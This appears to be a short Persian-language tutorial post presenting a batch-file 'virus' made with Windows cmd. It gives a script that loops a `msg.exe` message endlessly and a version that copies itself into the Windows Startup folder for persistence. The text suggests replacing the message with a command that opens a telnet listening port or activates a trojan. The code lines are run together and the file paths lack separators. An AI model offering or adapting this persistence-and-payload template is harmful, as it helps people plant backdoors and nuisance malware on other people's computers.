این ویروس  با خط فرمان ویندوز  یا همون cmd ساخته میشه و از حلقه 4 استفاده میکنه 
البته در عمل نمایش پیام مشکلی برای سیتم ایجاد نمیکنه اما اگه بجای نمایش پیام دستور بگوش بودن پورت خاصی برای تلنت و یا دستور فعال سازی تروجان باشه بسیار کاربری میشه

در حقیقت وقتی  goto در نقطه شروع متغییر mt رو فراخوانی میکنه دستور اصلی در حلقه بینهایت وارد میشه و اجرای ان ادامه میابد
 
فقط چند خط

  1. @echo off :mt // ایجاد نقطه شروع msg.exe * message ///////پیامی که تا خاموشی سیستم در حال اجرا خواهد بودgoto mt //فراخوانی حلقه

      ا
رسال فایل اجرایی به استارت اپ
  1. @echo off copy name.bat C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup ///مسیر استارت اپ ویندوز یعنی کپی فایل اجرایی در استارت اپ ویندوز:mt msg.exe * message ////بجای این پیام هر عملی میتونید جایگزین کنیدgoto mt